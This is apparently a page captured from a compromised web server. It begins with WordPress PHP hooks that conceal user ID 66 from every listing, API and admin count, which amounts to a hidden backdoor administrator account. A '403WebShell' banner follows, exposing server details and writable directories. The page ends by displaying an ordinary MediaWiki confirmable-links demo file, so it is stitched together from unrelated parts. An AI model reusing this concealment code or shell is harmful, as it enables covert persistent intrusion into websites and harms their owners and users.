add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/tests/uidesign/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/tests/uidesign/confirmable.html
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
	<meta charset="utf-8">
	<!--
	The jquery.confirmable module uses some additional modules and files
	for internationalization support. These are omitted here for simplicity.
	-->
	<link rel="stylesheet" href="../../resources/src/jquery/jquery.confirmable.css">
	<script src="../../resources/lib/jquery/jquery.js"></script>
	<script src="../../resources/src/jquery/jquery.confirmable.js"></script>
	<style>
	body {
		font: small sans-serif;
	}
	.mw-rollback-link a,
	.mw-unwatch-link a,
	.mw-thanks-thank-link a {
		background: #ccf;
	}
	</style>
</head>
<body>
	<h2>Introduction</h2>

	<p>The jquery.confirmable module provides a simple inline confirmation script for potentially destructive or uncancellable actions.</p>

	<p>Possible uses include confirmable "rollback" links in histories, confirmable "unwatch" links on watchlists, or confirmable "thanks" links (provided by the Echo extension).</p>

	<p>Shown below is a demo of how each of those could work on history and watchlist entries, in an LTR and RTL language. The enhanced links are highlighted in blue.</p>

	<h2>Examples</h2>

	<h3>LTR (English)</h3>

	<p>Watchlist:</p>

	<ul lang="en" dir="ltr">
		<li class="mw-line-even mw-changeslist-line-not-watched">
			(<a href="#">diff</a> | <a href="#">hist</a>)
			<span class="mw-changeslist-separator">. .</span>
			<span class="mw-title"><a href="#" class="mw-changeslist-title">Example page</a></span>; <span class="mw-changeslist-date">13:38</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="mw-plusminus-neg">(-130)</span>
			<span class="mw-changeslist-separator">. .</span>
			<a href="#" class="mw-userlink">Example user</a>
			<span class="mw-usertoollinks">(<a href="#">Talk</a> | <a href="#">contribs</a> | <a href="#">block</a>)</span>
			<span class="comment">(example edit)</span>
			<span class="mw-rollback-link">[<a href="https://www.mediawiki.org/wiki/Random_ideas_for_rollback_to_be_shelved_and_forgotten_about">rollback</a>]</span>
			(<span class="mw-unwatch-link"><a href="#">unwatch</a></span>)
		</li>
	</ul>

	<p>History:</p>

	<ul lang="en" dir="ltr">
		<li>
			<span class="mw-history-histlinks">(cur | <a href="#">prev</a>)</span>
			<input type="radio" style="visibility: hidden;" /><input type="radio" checked />
			<a href="#" class="mw-changeslist-date">13:38, 28 October 2013</a>
			<span class='history-user'>
				<a href="#" class="mw-userlink">Example user</a>
				<span class="mw-usertoollinks">(<a href="#">Talk</a> | <a href="#">contribs</a> | <a href="#">block</a>)</span>
			</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="history-size">(1,654 bytes)</span>
			<span class="mw-plusminus-neg">(-130)</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="comment">(example edit)</span>
			(<span class="mw-rollback-link"><a href="https://www.mediawiki.org/wiki/Random_ideas_for_rollback_to_be_shelved_and_forgotten_about">rollback 1 edit</a></span> | <span class="mw-history-undo"><a href="#">undo</a></span> | <span class="mw-thanks-thank-link"><a href="#">thank</a></span>)
		</li>
	</ul>

	<script>
		$( 'ul[lang="en"] .mw-rollback-link a' )
			.confirmable({ i18n: { confirm: 'Are you sure you want to rollback?' } });
		$( 'ul[lang="en"] .mw-unwatch-link a' )
			.confirmable({ handler: function(){ alert('Unwatched!') } });
		$( 'ul[lang="en"] .mw-thanks-thank-link a' )
			.confirmable({ handler: function(){ alert('Thanked!') } });
	</script>

	<h3>RTL (Hebrew)</h3>
	<!-- All of the Hebrew text below has been basically pulled out of my hat. -->

	<p>Watchlist:</p>

	<ul lang="he" dir="rtl">
		<li class="mw-line-even mw-changeslist-line-not-watched">
			(<a href="#">הבדל</a> | <a href="#">היסטוריה</a>)
			<span class="mw-changeslist-separator">. .</span>
			<span class="mw-title"><a href="#" class="mw-changeslist-title">דף דוגמה</a></span>; <span class="mw-changeslist-date">13:38</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="mw-plusminus-neg">(-57)</span>
			<span class="mw-changeslist-separator">. .</span>
			<a href="#" class="mw-userlink">דוגמא אדם</a>
			<span class="mw-usertoollinks">(<a href="#">שיחה</a> | <a href="#">תרומות</a> | <a href="#">חסימה</a>)</span>
			<span class="comment">(עריכה לדוגמה)</span>
			<span class="mw-rollback-link">[<a href="https://www.mediawiki.org/wiki/Random_ideas_for_rollback_to_be_shelved_and_forgotten_about">שחזור</a>]</span>
			(<span class="mw-unwatch-link"><a href="#">הפסקת מעקב</a></span>)
		</li>
	</ul>

	<p>History:</p>

	<ul lang="he" dir="rtl">
		<li>
			<span class="mw-history-histlinks">(נוכחית | <a href="#">קודמת</a>)</span>
			<input type="radio" style="visibility: hidden;" /><input type="radio" checked />
			<a href="#" class="mw-changeslist-date">23:41, 12 במאי 2012</a>
			<span class='history-user'>
				<a href="#" class="mw-userlink">דוגמא אדם</a>
				<span class="mw-usertoollinks">(<a href="#">שיחה</a> | <a href="#">תרומות</a> | <a href="#">חסימה</a>)</span>
			</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="history-size">(1,762 בתים)</span>
			<span class="mw-plusminus-neg">(-57)</span>
			<span class="mw-changeslist-separator">. .</span>
			<span class="comment">(עריכה לדוגמה)</span>
			(<span class="mw-rollback-link"><a href="https://www.mediawiki.org/wiki/Random_ideas_for_rollback_to_be_shelved_and_forgotten_about">שחזור עריכה אחת</a></span> | <span class="mw-history-undo"><a href="#">ביטול</a></span> | <span class="mw-thanks-thank-link"><a href="#">תודה</a></span>)
		</li>
	</ul>

	<script>
		var hebrewI18n = {
			confirm: 'האם ברצונך להמשיך?',
			yes: 'כן',
			no: 'לא',
		}

		$( 'ul[lang="he"] .mw-rollback-link a' )
			.confirmable({ i18n: $.extend( {}, hebrewI18n, { confirm: 'האם ברצונך לשחזר?' } ) });
		$( 'ul[lang="he"] .mw-unwatch-link a' )
			.confirmable({ i18n: hebrewI18n, handler: function(){ alert('Unwatched!') } });
		$( 'ul[lang="he"] .mw-thanks-thank-link a' )
			.confirmable({ i18n: hebrewI18n, handler: function(){ alert('Thanked!') } });
	</script>
	<style>
		/* This is normally handled by CSSJanus. */
		ul[dir=rtl] .jquery-confirmable-button {
			margin-left: 0;
			margin-right: 1ex;
		}
	</style>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit